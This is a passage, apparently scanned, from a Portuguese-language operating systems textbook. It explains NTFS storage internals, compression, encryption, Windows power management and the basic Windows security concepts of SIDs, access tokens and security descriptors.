de utilitários de registro é empregado pelo sistema de 
criptografia de arquivos. 

Por fim, chegamos ao atributo pelo qual todos es- 
peramos: o fluxo de dados (ou fluxos, em alguns ca- 
sos). Um arquivo NTFS possui um ou mais fluxos de 
dados a ele associados e é aí que se encontra a carga 
útil (payload). O fluxo de dados padrão não é nome- 
ado (por exemplo, caminhodir\nomearquivo: :$DATA), 
mas cada fluxo alternativo de dados possui um nome, 
como caminhodir\nomearquivo:nomefluxo:$DATA. 

Para cada fluxo, o seu nome, se houver, fica no ca- 
beçalho desse atributo. Em seguida ao cabeçalho está 
uma lista de endereços de disco indicando quais blocos 
o fluxo contém ou o próprio fluxo, para fluxos de so- 
mente algumas centenas de bytes (e há muitos deles). 
Quando o fluxo de dados real fica no registro da MFT, 
usa-se o termo arquivo imediato (MULLENDER e 
TANENBAUM, 1984). 
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É claro que, na maioria das vezes, os dados não 
cabem no registro da MFT; portanto, o normal é que 
esse atributo seja não residente. Agora, vejamos como 
o NTFS fica sabendo da localização dos atributos não 
residentes — particularmente, dados. 


Alocação de armazenamento 


Por questões de eficiência, o modelo para o rastrea- 
mento dos blocos de disco requer que eles sejam atribui- 
dos em séries de blocos consecutivos, quando possível. 
Por exemplo, se o primeiro bloco lógico de um fluxo 
estiver no bloco 20 do disco, então o sistema tentará 
alocar o segundo bloco lógico no bloco 21, o terceiro 
no bloco 22 e assim por diante. Uma maneira de fazer 
isso consiste em alocar, se possível, vários blocos de 
uma vez só. 

Os blocos em um arquivo são descritos por uma se- 
quência de registros, e cada um descreve uma sequên- 
cia de blocos logicamente contíguos. Para um fluxo sem 
espaços vazios, haverá somente um desses registros. Os 
fluxos escritos na ordem, do início até o fim, pertencem 
a essa categoria. Um fluxo com um espaço vazio (por 
exemplo, apenas os blocos de 0-49 e os blocos de 60- 
79 são definidos) terá dois registros. Esse fluxo poderia 
ser produzido escrevendo-se os primeiros 50 blocos e 
depois buscando à frente pelo bloco lógico 60 e, então, 
escrevendo os outros 20 blocos. Quando um espaço va- 
zio é lido, todos os bytes que não existem são zeros. Um 
arquivo com um espaço vazio é chamado de arquivo 
esparso. 

Cada registro começa com um cabeçalho informan- 
do o deslocamento do primeiro bloco dentro do fluxo. 
Depois vem o deslocamento do primeiro bloco não co- 
berto pelo registro. No exemplo anterior, o primeiro 


registro teria um cabeçalho de (0, 50) e forneceria os 
endereços de disco para esses 50 blocos. O segundo te- 
ria um cabeçalho de (60, 80) e forneceria os endereços 
de disco para esses 20 blocos. 

Cada cabeçalho de registro é seguido por um ou 
mais pares, cada um indicando um endereço de disco e 
um tamanho. O endereço de disco é o deslocamento do 
bloco de disco desde o início de sua partição; o tamanho 
é o número de blocos na série. No registro podem estar 
quantos pares forem necessários. O uso desse esquema 
para um arquivo de nove blocos e três séries está ilus- 
trado na Figura 11.41. 

Nessa figura temos um registro da MFT para um pe- 
queno fluxo de nove blocos (cabeçalho 0-8). Ele con- 
siste em três séries de blocos consecutivos de disco. A 
primeira série é formada pelos blocos 20 a 23, a segun- 
da é constituída pelos blocos 64 e 65 e a terceira consis- 
te nos blocos 80 a 82. Cada uma dessas séries é gravada 
no registro da MFT como um par (endereço de disco, 
contador de bloco). O número de séries depende do de- 
sempenho do alocador de blocos de disco em encontrar 
séries de blocos consecutivos quando o fluxo é criado. 
Para um fluxo de n blocos, o número de séries pode ser 
qualquer coisa entre 1 en. 

Convém fazer vários comentários aqui. Primeiro, 
não há um limite máximo para o tamanho dos fluxos 
que podem ser representados dessa maneira. Sem com- 
pactação de endereço, cada par requer dois valores de 
64 bits no par, para um total de 16 bytes. Contudo, um 
par poderia representar um milhão ou mais blocos con- 
secutivos no disco. Na verdade, um fluxo de 20 MB, 
formado por 20 séries de um milhão de blocos de 1 KB 
cada, cabe facilmente em um registro da MFT. O mes- 
mo não ocorre com um fluxo de 60 KB espalhado por 
60 blocos isolados. 


[FIGURA 11.41) Um registro da MFT para um arquivo de três séries e nove blocos. 
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Segundo, enquanto o modo direto de representar 
cada par ocupa 2 x 8 bytes, há um método de compacta- 
ção disponível para reduzir o tamanho dos pares a me- 
nos de 16 bytes. Muitos endereços de disco têm vários 
bytes zero nos bytes de ordem mais alta. Esses zeros po- 
dem ser omitidos. O cabeçalho de dados indica quantos 
deles estão omitidos, isto é, quantos bytes são realmente 
usados por endereço. Outros tipos de compactação tam- 
bém são empregados. Na prática, muitas vezes os pares 
têm apenas 4 bytes. 

Nosso primeiro exemplo foi fácil: toda a informação 
do arquivo cabia em um registro da MFT. O que acon- 
tece quando o arquivo é tão grande ou tão fragmenta- 
do que a informação do bloco não cabe em um registro 
da MFT? A resposta é simples: usam-se dois ou mais 
registros da MFT. Na Figura 11.42 vemos um arquivo 
cujo registro-base esta no registro 102 da MFT. Ele tem 
séries demais para um registro da MFT; desse modo, 
calcula-se de quantos registros de extensão ele precisa 
— por exemplo, dois — e inserem-se seus índices no 
registro-base. O restante do registro é usado pelas pri- 
meiras k séries de dados. 

Observe que a Figura 11.42 apresenta alguma re- 
dundância. Em teoria, não seria necessário especificar o 
final de uma sequência de séries, pois essa informação 
pode ser calculada a partir dos pares das séries. O mo- 
tivo para reforçar essa informação é a busca por mais 
eficiência: para encontrar o bloco em uma determinada 
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posição, é necessário apenas verificar os cabeçalhos do 
registro, não os pares de séries. 

Quando todo o espaço no registro 102 estiver ocu- 
pado, o armazenamento da série prosseguirá no registro 
105 da MFT. São colocadas nesse registro tantas séries 
quantas couberem. Quando esse registro também esti- 
ver cheio, o restante das séries irá para o registro 108 da 
MFT. Desse modo, diversos registros da MFT podem 
ser usados para tratar de grandes arquivos fragmentados. 

Surge um problema quando são necessários tantos 
registros da MFT que não há espaço no registro-base 
da MFT para relacionar todos os seus índices. Mas há 
uma solução para esse problema: a lista de registros de 
extensão da MFT torna-se não residente (isto é, arma- 
zenada no disco, e não no registro-base da MFT). Desse 
modo, ela pode crescer o quanto precisar. 

Uma entrada da MFT para um diretório pequeno está 
ilustrada na Figura 11.43. O registro contém várias en- 
tradas de diretório; cada uma delas descreve um arqui- 
vo ou um diretório. Cada entrada tem uma estrutura de 
tamanho fixo, seguida por um nome de arquivo, de ta- 
manho variável. A parte fixa contém o índice da entrada 
da MFT do arquivo, o tamanho do nome do arquivo e 
diversos outros campos e flags. Buscar por uma entrada 
em um diretório consiste em verificar todos os nomes 
de arquivo, um por vez. 

Grandes diretórios usam um formato diferente. Em 
vez de uma lista linear de arquivos, é empregada uma 


[FIGURA 11.42] Um arquivo que requer três registros MFT para armazenar todas as suas séries. 





(FIGURA 11.43] O registro da MFT para um pequeno diretório. 
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árvore B+ para fazer uma possível busca em ordem al- 
fabética e facilitar a inserção de novos nomes no diretó- 
rio, no lugar apropriado. 

A análise do caminho do diretório la/gum local pros- 
segue agora no diretório-raiz de C:, cujos blocos podem 
ser encontrados na entrada 5 da MFT (veja a Figura 
11.39). A busca da cadeia “algum”, no diretório-raiz, 
retorna o índice do diretório algum na MFT. Então ocor- 
re a busca da cadeia “local”, que se refere ao registro 
MTF para esse arquivo. O NTFS executa verificações 
de acesso voltando ao monitor de referência de seguran- 
ça e, se tudo der certo, ele procura pelo atributo ::8DATA 
no registro da MFT, que é o fluxo de dados padrão. 

Agora temos informação suficiente para entender 
como a busca por nomes de arquivos funciona para um 
arquivo \??\C-\algum\local. Na Figura 11.20, vimos 
como o Win32, o sistema de chamadas nativas do NT 
e os gerenciadores de E/S e de objetos trabalham em 
conjunto na abertura de um arquivo por meio do envio 
de uma solicitação de E/S para a pilha de dispositivos 
do NTFS para o volume C:. A solicitação de E/S pede 
ao NTFS para preencher um objeto de arquivo para o 
restante do nome do diretório, \algum\local. 

Se a busca pelo arquivo local for bem-sucedida, o 
NTFS configura ponteiros para seus próprios metada- 
dos no objeto de arquivo, transmitidos a partir do geren- 
ciador de E/S. Os metadados incluem um ponteiro para 
o registro do MTF, informações sobre compactação e 
travas em regiões, vários detalhes sobre compartilha- 
mento etc. A maior parte desses metadados está em es- 
truturas de dados compartilhadas entre todos os objetos 
referentes ao arquivo. Poucos campos são específicos 
somente para o arquivo atualmente aberto, tal como o 
que define se o arquivo deve ser excluído quando fecha- 
do. Uma vez que a abertura tenha sido bem-sucedida, o 
NTFS chama loCompleteRequest para passar o IRP de 
volta da pilha de E/S para os gerenciadores de E/S e de 
objetos. Em última instância, um descritor para o objeto 
de arquivo é inserido na tabela de descritores do proces- 
so corrente, e o controle é devolvido ao modo usuário. 
Nas chamadas ReadFile subsequentes, o descritor pode 
ser fornecido por uma aplicação, especificando que o 
objeto de arquivo para C:lalgum local deve ser incluído 
na solicitação de leitura transmitida da pilha de disposi- 
tivos para o NTFS. 

Além de arquivos e diretórios comuns, o NTFS su- 
porta ligações estritas similares às do UNIX e também 
ligações simbólicas usando um mecanismo chamado de 
pontos de reanálise. No NTFS, é possível rotular um 
arquivo ou um diretório como um ponto de reanálise 
e associar um bloco de dados a ele. Quando o arquivo 


ou o diretório for encontrado durante a análise de seu 
nome, a operação falha e o bloco de dados é devolvi- 
do ao gerenciador de objetos. Este pode interpretar os 
dados como representação de um caminho alternativo 
e, em seguida, atualizar a cadeia de caracteres para in- 
terpretar e tentar novamente a operação de E/S. Esse 
mecanismo serve para suportar tanto as ligações sim- 
bólicas quanto os sistemas de arquivos por montagem, 
redirecionando a busca para uma parte diferente da hie- 
rarquia de diretórios ou até mesmo para uma partição 
diferente. 

Os pontos de reanálise também são utilizados para 
etiquetar arquivos individuais para drivers de filtro do 
sistema de arquivos. Na Figura 11.20, mostramos como 
os filtros podem ser instalados entre o gerenciador de 
E/S e o sistema de arquivos. As solicitações de E/S são 
concluídas com a chamada loCompleteRequest, que 
passa o controle para as rotinas de conclusão que cada 
driver representado na pilha de dispositivos inseriu no 
IRP quando a solicitação estava sendo feita. Um driver 
que queira etiquetar um arquivo associa uma etiqueta de 
reanálise e monitora as rotinas de conclusão para opera- 
ções de abertura de arquivo que falharam porque encon- 
traram um ponto de reanálise. A partir do bloco de dados 
devolvido com o IRP, o driver consegue distinguir se 
esse é um bloco de dados que o próprio driver associou 
ao arquivo. Caso seja, o driver irá parar de processar a 
conclusão e continuará a processar a solicitação de E/S 
original. Em geral, isso irá proceder com a solicitação 
de abertura, mas existe um flag que informa ao NTFS 
para ignorar o ponto de reanálise e abrir o arquivo. 


Compactação de arquivos 


O NTFS suporta a compactação transparente de 
arquivos. Um arquivo pode ser criado em modo com- 
pactado, o que significa que o NTFS tenta compactar 
automaticamente os blocos quando eles são escritos e 
descompactá-los automaticamente quando são lidos. Os 
processos que leem ou escrevem arquivos compactados 
nem ficam sabendo que está havendo compactação e 
descompactação. 

A compactação funciona da seguinte maneira: 
quando o NTFS escreve, no disco, um arquivo mar- 
cado para compactação, ele verifica os primeiros 16 
blocos (lógicos) do arquivo, sem se preocupar com 
quantas séries eles ocupam. Então, ele executa um al- 
goritmo de compactação nesses blocos. Se os dados 
resultantes puderem ser armazenados em 15 blocos ou 
menos, os dados compactados serão escritos no dis- 
co, preferencialmente em uma série, se possível. Se 


os dados compactados ainda ocuparem 16 blocos, os 
16 blocos serão escritos na forma descompactada. De- 
pois, os blocos 16 a 31 serão verificados para saber se 
eles podem ser compactados para 15 blocos ou menos, 
e assim por diante. 

A Figura 11.44(a) mostra um arquivo no qual os pri- 
meiros 16 blocos foram compactados para oito blocos, 
os 16 blocos seguintes falharam na compactação e os 
últimos 16 blocos foram compactados em 50%. As três 
partes foram escritas como três séries e armazenadas no 
registro da MFT. Os blocos “que faltam” são armaze- 
nados na entrada da MFT com o endereço de disco 0, 
conforme mostra a Figura 11.44(b). Nesse caso, o ca- 
beçalho (0, 48) é seguido por cinco pares, dois para a 
primeira série (compactada), um para a série descom- 
pactada e dois para a série final (compactada). 

Quando o arquivo é lido, o NTFS deve saber quais 
séries estão compactadas e quais não estão. Ele fica sa- 
bendo disso pelos endereços de disco. Um endereço de 
disco O indica que é a parte final dos 16 blocos com- 
pactados. Para evitar ambiguidade, o bloco de disco 0 
não pode ser usado para armazenar dados. De qualquer 
maneira, como ele contém o setor de inicialização, é im- 
possível usá-lo para dados. 

O acesso aleatório aos arquivos compactados é 
possível, mas complicado. Suponha que um processo 
busque pelo bloco 35 na Figura 11.44. Como o NTFS 
localiza o bloco 35 em um arquivo compactado”? A res- 
posta é: ele primeiro lê e descompacta toda a série. Em 
seguida, ele busca saber onde o bloco 35 está e então 
encaminha o bloco para algum processo que possa lê- 
-lo. A escolha de 16 blocos como unidade de compac- 
tação foi uma escolha de meio-termo. Torná-lo menor 
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deixaria a compactação menos eficaz. Torná-lo maior 
tornaria o acesso aleatório mais custoso. 


Uso de diário 


O NTFS suporta dois mecanismos para que progra- 
mas detectem mudanças em arquivos e diretórios. O 
primeiro deles é uma operação NtNotifyChangeDirec- 
toryFile, que passa um buffer ao sistema que, por sua 
vez, retorna quando uma mudança em um diretório ou 
subdiretório é detectada. O resultado é que o buffer foi 
preenchido com uma lista de registros de modificação. 
Se for muito pequeno, registros são perdidos. 

O segundo mecanismo é o diário de modificações do 
NTFS. Este mantém uma lista de todos os registros de 
modificação para diretórios e arquivos no volume em um 
arquivo especial, cujos programas podem ler utilizando 
operações especiais de controle do sistema de arquivos, 
ou seja, a opção FSCTL QUERY USN JOURNAL da 
API NtFsControlFile. O arquivo de diário em geral é 
muito grande e há poucas chances que entradas sejam 
reutilizadas antes que possam ser examinadas. 


Criptografia de arquivos 


Os computadores são usados para armazenar todo 
tipo de dados confidenciais, entre eles planos de incor- 
porações, informação sobre tributos e cartas de amor 
— enfim, informações cujos donos não querem ver re- 
veladas a qualquer um. O roubo de informação pode 
ocorrer quando um notebook é perdido ou roubado, 
quando um computador desktop é reinicializado por um 
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disco flexível MS-DOS, para contornar a segurança do 
Windows, ou quando um disco rígido é fisicamente re- 
movido de um computador e instalado em outro com 
um sistema operacional inseguro. 

O Windows resolve esses problemas disponibilizan- 
do uma opção para criptografar arquivos; desse modo, 
mesmo quando o computador é roubado ou reiniciali- 
zado usando o MS-DOS, os arquivos serão ilegíveis. O 
modo normal de usar a criptografia no Windows é mar- 
cando certos diretórios como criptografados, o que faz 
com que todos os seus arquivos sejam criptografados; 
além disso, novos arquivos movidos ou criados nesses 
diretórios também são criptografados. Os processos de 
encriptar e decriptar em si não são gerenciados pelo 
próprio NTFS, mas por um driver chamado EFS (En- 
cryption File System — sistema de arquivos por crip- 
tografia), que registra callback com o NTFS. 

O EFS oferece criptografia para arquivos e diretó- 
rios específicos. Existe ainda outra facilidade de cripto- 
grafia no Windows, chamada BitLocker, que codifica 
quase todos os dados de um volume e que pode ajudar a 
proteger os dados independentemente de qualquer ocor- 
rência — desde que o usuário aproveite o mecanismo 
disponível para chaves fortes. Dado o número de sis- 
temas perdidos ou roubados a todo instante e a gran- 
de sensibilidade ao problema de roubo de identidade, é 
muito importante garantir que os segredos estejam bem 
guardados. Um número surpreendente de notebooks é 
perdido diariamente. As principais empresas de Wall 
Street estimam que, semanalmente, pelo menos um de 
seus notebooks é esquecido em um táxi só na cidade de 
Nova York. 


11.9 Gerenciamento de energia 
do Windows 


O gerenciador de energia evita desperdício no uso 
de energia pelo sistema. Historicamente, o gerencia- 
mento do consumo de energia consistia em desligar o 
monitor e evitar que os discos continuassem girando. 
Mas o problema está se tornando cada vez mais com- 
plicado pelos requisitos para estender o tempo que os 
notebooks podem funcionar com baterias, e questões 
de conservação de energia relacionadas a computadores 
desktop mantidos ligados o tempo todo e o alto custo de 
fornecer energia para as grandes fazendas de servidores 
que existem atualmente. 

Alguns dos recursos de gerenciamento de energia 
mais recentes são a redução do consumo de energia 
dos componentes quando o sistema não está em uso, 


passando os dispositivos individuais para estados de es- 
pera (standby) ou mesmo desligando-os totalmente por 
meio de chaves de energia suaves (soft). Os multipro- 
cessadores desligam CPUs individuais quando elas não 
são necessárias, e até mesmo as taxas de relógio das 
CPUs em execução podem ser ajustadas para baixo a 
fim de reduzir o consumo de energia. Quando um pro- 
cessador está ocioso, seu consumo de energia também é 
reduzido, pois ele não precisa fazer nada além de espe- 
rar que haja uma interrupção. 

O Windows admite um modo de desligamento espe- 
cial, chamado hibernação, que copia toda a memória 
física para o disco e então reduz o consumo de energia 
para o mínimo (os notebooks podem rodar por semanas 
em um estado hibernado), com pouco dreno da bateria. 
Como todo o estado da memória é gravado em disco, 
você pode até mesmo substituir a bateria de um note- 
book enquanto ele está hibernando. Quando o sistema 
retorna à atividade após a hibernação, ele restaura o es- 
tado salvo na memória (e reinicializa os dispositivos de 
E/S). Isso faz o computador retornar ao mesmo estado 
em que se encontrava antes da hibernação, sem ter de 
novamente fazer a autenticação e iniciar todas as aplica- 
ções e serviços que estavam em execução. O Windows 
otimiza esse processo ignorando as páginas não modifi- 
cadas, já mantidas em disco, e compactando outras pá- 
ginas da memória para reduzir a quantidade de largura 
de banda de E/S necessária. O algoritmo de hibernação 
se ajusta automaticamente para equilibrar entre E/S e 
vazão do processador. Se houver mais de um processa- 
dor disponível, ele utiliza a compactação mais custosa, 
porém mais eficiente, para reduzir a largura de banda de 
E/S necessária. Quando a largura de banda de E/S for 
suficiente, a hibernação pulará totalmente o algoritmo 
de compactação. Com a geração atual de multiprocessa- 
dores, a hibernação e a retomada podem ser realizadas 
em alguns segundos, até mesmo em sistemas com mui- 
tos gigabytes de RAM. 

Uma alternativa à hibernação é o modo de espera, 
em que o gerenciador de energia reduz o sistema inteiro 
para o mais baixo estado de energia possível, usando 
apenas energia suficiente para a manutenção da RAM 
dinâmica. Como a memória não precisa ser copiada 
para o disco, isso é mais rápido do que a hibernação em 
alguns sistemas. 

Apesar da disponibilidade da hibernação e do modo 
de espera, muitos usuários ainda têm o hábito de desli- 
gar seu PC quando terminam de trabalhar. O Windows 
usa a hibernação para realizar um falso desligamento e 
partida, chamado HiberBoot, que é muito mais rápido 
do que o desligamento e a partida normais. Quando o 


usuário diz ao sistema para desligar, o HiberBoot realiza 
o logoff do usuário e depois hiberna o sistema no ponto 
em que ele normalmente seria autenticado de novo. Mais 
adiante, quando o usuário ligar o sistema outra vez, o 
HiberBoot retomará o sistema no ponto da autenticação. 
Para o usuário, parece que o desligamento foi muito, 
muito rápido, pois a maioria das etapas de inicialização 
do sistema são contornadas. Naturalmente, às vezes o 
sistema precisa realizar um desligamento verdadeiro, a 
fim de resolver um problema ou instalar uma atualização 
no núcleo. Se o sistema for solicitado a reinicializar em 
vez de desligar, ele passará por um desligamento verda- 
deiro e realizará uma inicialização normal. 

Em smartphones e tablets, bem como na geração 
mais nova de notebooks, os dispositivos de computa- 
ção sempre deverão estar ligados e ainda consumir pou- 
ca energia. Para oferecer essa experiência, o Windows 
Moderno implementa uma versão especial de gerencia- 
mento de energia chamada CS (Connected Standby — 
Espera conectada). O uso do recurso de CS é possível 
em sistemas com hardware de rede especial, capaz de 
ouvir o tráfego em um pequeno conjunto de conexões 
usando muito menos energia do que se a CPU estivesse 
funcionando. Um sistema CS sempre parece estar liga- 
do, saindo da espera conectada assim que a tela for liga- 
da pelo usuário. A espera conectada é diferente do modo 
de espera normal, pois um sistema CS também sairá da 
espera quando receber um pacote em uma conexão mo- 
nitorada. Quando a bateria começar a ficar com carga 
baixa, um sistema CS entrará no estado de hibernação, 
para evitar exaurir completamente sua carga e talvez 
perder dados do usuário. 

Alcançar um tempo de vida bom para a bateria exi- 
ge mais do que simplesmente desligar os processadores 
com a maior frequência possível. Também é importante 
manter o processador desligado pelo maior tempo pos- 
sível. O hardware de rede CS permite que os processa- 
dores permaneçam desligados até que os dados tenham 
chegado, mas outros eventos também podem fazer com 
que os processadores sejam ligados novamente. No 
Windows baseado no NT, drivers de dispositivo, ser- 
viços do sistema e as próprias aplicações normalmente 
são executadas por nenhum motivo em particular além 
de verificar as coisas. Essa atividade de sondagem em 
geral é baseada na definição de temporizadores para 
executar periodicamente um código no sistema ou na 
aplicação. A sondagem baseada em temporizador pode 
produzir uma dissonância de eventos ativando o pro- 
cessador. Para evitar isso, o Windows Moderno exige 
que os temporizadores especifiquem um parâmetro de 
imprecisão, que permite ao sistema operacional agrupar 
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os eventos de temporizador e reduzir o número de oca- 
siões separadas que um dos processadores terá de ser 
reativado. O Windows também formaliza as condições 
nas quais uma aplicação que não está sendo executada 
ativamente pode executar o código em segundo plano. 
Operações como verificar atualizações ou renovar o 
conteúdo não podem ser realizadas apenas solicitando 
a execução quando um temporizador expirar. Uma apli- 
cação deverá deixar que o sistema operacional decida 
quando irá executar tais atividades de segundo plano. 
Por exemplo, a verificação de atualizações poderia 
ocorrer somente uma vez por dia ou da próxima vez que 
o dispositivo estiver carregando sua bateria. Um con- 
junto de agenciadores (brokers) do sistema oferece uma 
série de condições que podem ser usadas para limitar 
quando a atividade de segundo plano será realizada. Se 
uma tarefa de segundo plano precisar acessar uma rede 
de baixo custo ou utilizar as credenciais de um usuário, 
os agenciadores não executarão a tarefa até que as con- 
dições de pré-requisito estejam presentes. 

Muitas aplicações atuais são implementadas com 
código local e serviços na nuvem. O Windows ofere- 
ceo WNS (Window Notification Service — Serviço de 
notificação do Windows), para permitir que serviços de 
terceiros levem notificações a um dispositivo Windows 
no sistema CS sem exigir que o hardware de rede CS 
escute especificamente os pacotes dos servidores de ter- 
ceiros. Notificações WNS podem sinalizar eventos de 
tempo crítico, como a chegada de uma mensagem de 
texto ou uma chamada VoIP. Quando um pacote WNS 
chega, o processador precisa ser ligado para processá- 
-lo, mas a capacidade do hardware de rede CS de dife- 
renciar entre o tráfego de diferentes conexões significa 
que o processador não precisa ser despertado para cada 
pacote aleatório que chega na interface de rede. 


11.10 Segurança no Windows 8 


Originalmente, o NT foi projetado para cumprir as 
determinações de segurança C2 do Departamento de 
Defesa dos Estados Unidos (DoD 5200.28-STD) — o 
Livro Laranja (Orange Book), que os sistemas DoD se- 
guros devem seguir. Esse padrão exige que os sistemas 
operacionais tenham certas propriedades para serem 
classificados como seguros o suficiente para certos ti- 
pos de atividades militares. Embora o Windows não te- 
nha sido especificamente projetado para o cumprimento 
das determinações C2, ele herda várias das proprieda- 
des de segurança do projeto de segurança original do 
NT. Entre elas, estão: 
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1. Acesso seguro com medidas contra imitações 
(spoofing). 

2. Controles de acesso discricionário. 

3. Controles de acesso privilegiado. 

4. Proteção do espaço de endereçamento por 
processo. 

5. Novas páginas devem ser zeradas antes de serem 
mapeadas. 

6. Auditoria de segurança. 


Revisemos esses itens resumidamente. 

Acesso seguro ao sistema significa que o administra- 
dor do sistema pode exigir que todos os usuários tenham 
uma senha para se conectarem. Imitações (spoofing) 
ocorrem quando um usuário mal-intencionado escreve 
um programa que mostra a janela ou a tela-padrão de 
acesso ao sistema e então se afasta do computador na 
esperança de que algum usuário ingênuo se sente e entre 
com seu nome e sua senha. O nome e a senha são, então, 
escritos no disco e ao usuário é dito que o acesso falhou. 
O Windows impede esse tipo de ataque instruindo os 
usuários a pressionar as teclas CTRL-ALT-DEL para se 
conectarem. Essa sequência de teclas é sempre captu- 
rada pelo driver do teclado, que, por sua vez, invoca 
um programa do sistema que mostra a verdadeira tela 
de acesso. Esse procedimento funciona porque não há 
como o processo do usuário desabilitar o processamen- 
to de CTRL-ALT-DEL no driver do teclado. Mas o NT 
desabilita o uso da sequência de atenção segura CTRL- 
-ALT-DEL em alguns casos, particularmente para con- 
sumidores e em sistemas que ativaram a acessibilidade 
para deficientes, em smartphones, tablets e no Xbox, 
onde é raro existir um teclado físico. 

Os controles de acesso discricionários permitem ao 
dono de um arquivo ou de outro objeto dizer quem pode 
usá-lo e de que modo. Os controles de acessos privile- 
giados permitem que o administrador do sistema (supe- 
rusuário) ignore os controles de acesso discricionários 
quando necessário. A proteção do espaço de endereça- 
mento significa, simplesmente, que cada processo tem 
seu próprio espaço de endereçamento virtual e que não 
pode sofrer acessos por qualquer processo que não es- 
teja autorizado a isso. O próximo item significa que, 
quando o heap do processo cresce, as páginas mapeadas 
nela são, antes, zeradas; desse modo, os processos não 
podem encontrar nenhuma informação antiga colocada 
lá pelo proprietário anterior daquela página (daí o pro- 
pósito das listas de páginas zeradas, da Figura 11.34, 
que fornecem as páginas zeradas justamente por isso). 
Por fim, a auditoria de segurança permite ao administra- 
dor produzir um registro (log) de certos eventos relacio- 
nados com a segurança. 


Embora o Livro Laranja não especifique o que deve 
acontecer quando alguém rouba um notebook, não é in- 
comum que se tenha um roubo por semana nas grandes 
empresas. Em consequência, o Windows oferece ferra- 
mentas que podem ser utilizadas por um usuário cons- 
ciente para minimizar os danos quando um notebook é 
roubado ou perdido (por exemplo, autenticação segura, 
arquivos criptografados etc.). É claro que os usuários 
conscientes são aqueles que não perdem o notebook — 
são os outros que causam problemas. 

Na próxima seção, descreveremos os conceitos bá- 
sicos por trás da segurança do Windows. Depois estu- 
daremos as chamadas do sistema relacionadas com a 
segurança. Por fim, concluiremos vendo como a segu- 
rança é implementada. 


11.10.1 Conceitos fundamentais 


Todo usuário (e grupo de usuários) do Windows é 
identificado por um SID (Security ID — identificador 
de segurança). Os SIDs são números binários com um 
pequeno cabeçalho seguido por um componente longo 
e aleatório. A intenção é que cada SID seja único em 
todo o mundo. Quando um usuário dá partida em um 
processo, o processo e seus threads executam sob o SID 
do usuário. A maior parte do sistema de segurança des- 
tina-se a assegurar que cada objeto possa ser acessado 
somente pelos threads com SIDs autorizados. 

Cada processo tem um token de acesso que especifi- 
ca um SID e outras propriedades. Esse token é em geral 
atribuído no momento de acesso ao sistema, pelo winlo- 
gon, conforme descrito a seguir. (O formato do token é 
mostrado na Figura 11.45.) Os processos devem chamar 
GetTokenInformation para obter essa informação. O ca- 
beçalho contém algumas informações administrativas. 
O campo de validade pode indicar quando o token deixa 
de ser válido, mas atualmente ele não está sendo utili- 
zado. O campo Grupos especifica os grupos aos quais 
o processo pertence; isso é necessário para o subsiste- 
ma POSIX. O DACL (Discretionary ACL — lista de 
controle de acesso discricionário) é a lista de controle 
de acesso atribuída aos objetos criados pelo processo se 
nenhuma outra ACL foi especificada. O SID do usuário 
indica quem possui o processo. Os SIDs restritos são 
para permitir que processos não confiáveis participem 
de trabalhos junto com os processos confiáveis, mas 
com menos poder de causar danos. 

Por fim, os privilégios relacionados, se houver, dão 
ao processo poderes especiais, como o direito de des- 
ligar a máquina ou de acessar arquivos para os quais o 
acesso seria negado a outros processos. Com isso, os 
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privilégios dividem o poder do superusuário em vários 
direitos que podem ser atribuidos individualmente aos 
processos. Assim, um usuário pode ter algum poder 
de superusuário, mas não todo o poder. Resumindo, o 
token de acesso indica quem possui o processo e quais 
defaults e poderes são associados a ele. 

Quando um usuário se conecta ao sistema, o winlo- 
gon fornece um token ao processo inicial. Os processos 
subsequentes normalmente herdam esse token e pros- 
seguem. O token de acesso de um processo se aplica, 
de início, a todos os threads do processo. Contudo, um 
thread pode obter outro token durante a execução — 
nesse caso, o token de acesso do thread sobrepõe o token 
de acesso do processo. Particularmente, um thread clien- 
te pode passar seu token de acesso a um thread servidor, 
para que o servidor possa ter acesso aos arquivos pro- 
tegidos e a outros objetos do cliente. Esse mecanismo 
é chamado de personificação e é implementado pelas 
camadas de transporte (ou seja, ALPC, pipes nomeados 
e TCP/IP). Ele é utilizado pela RPC para comunicação 
entre clientes e servidores. Os transportes utilizam in- 
terfaces internas no componente monitor de referên- 
cias de segurança do núcleo para extrair o contexto de 
segurança para o token de acesso do thread corrente e 
enviam para o lado servidor, onde é utilizado na cons- 
trução de um token que pode ser utilizado pelo servidor 
para personificar o cliente. 

Outro conceito básico é o descritor de segurança. 
Todo objeto tem um descritor de segurança associado, 
que indica quem pode realizar quais operações dele. Os 
descritores de segurança são especificados quando os 
objetos são criados. O sistema de arquivos NTFS e o 
registro mantêm uma forma persistente de descritor de 
segurança utilizado para criar o descritor de segurança 
para os objetos Arquivo e Chave (objetos do gerencia- 
dor de objetos que representam instâncias abertas de 
arquivos e chaves). 

Um descritor de segurança é formado por um cabe- 
çalho, seguido por uma DACL com um ou mais ACEs 
(Access Control Elements — elementos de controle 
de acesso). Os dois principais tipos de elementos são 
Permissão e Negação. Um elemento de permissão espe- 
cifica um SID e um mapa de bits que determina quais 
operações os processos com aquele SID podem reali- 
zar com o objeto. Um elemento de negação funciona 
do mesmo modo, só que, nesse caso, quem chama não 


pode realizar a operação. Por exemplo, Ana tem um ar- 
quivo cujo descritor de segurança especifica que todos 
têm acesso à leitura e que Elvis não tem acesso. Cata- 
rina tem acesso para leitura e escrita e a própria Ana 
tem acesso total. Esse exemplo simples está ilustrado 
na Figura 11.46. O SID Todos refere-se ao conjunto de 
todos os usuários, mas ele é sobreposto por quaisquer 
ACEs explícitos que vierem em seguida. 

Além da DACL, um descritor de segurança também 
tem uma SACL (System ACL — lista de controle de 
acesso ao sistema), parecida com uma DACL, só que 
especifica quais operações sobre o objeto são gravadas 
no registro (log) de eventos de segurança, e não quem 
pode usar o objeto. Na Figura 11.46, toda operação que 
Marília fizer sobre o arquivo será registrada. O SACL 
também contém um nível de integridade, que descre- 
veremos a seguir. 


11.10.2 Chamadas API de segurança 


A maioria dos mecanismos de controle de acesso 
do Windows é baseada em descritores de segurança. O 
padrão usual é que, quando um processo cria um obje- 
to, ele fornece um descritor de segurança como um dos 
parâmetros para CreateProcess, CreateFile ou para ou- 
tra chamada de criação de um objeto. Esse descritor de 
segurança torna-se, então, o descritor de segurança as- 
sociado ao objeto, como vemos na Figura 11.46. Se ne- 
nhum descritor de segurança for fornecido na chamada 
de criação do objeto, será usada a configuração-padrão 
de segurança do token de acesso de quem fez a chamada 
(veja a Figura 11.45). 

Muitas das chamadas de segurança da API Win32 
relacionam-se com o gerenciamento dos descritores 
de segurança; portanto, iremos nos concentrar nessas 
chamadas. As chamadas mais importantes são apre- 
sentadas na Figura 11.47. Para criar um descritor de 
segurança, primeiro deve ser alocada sua memória e 
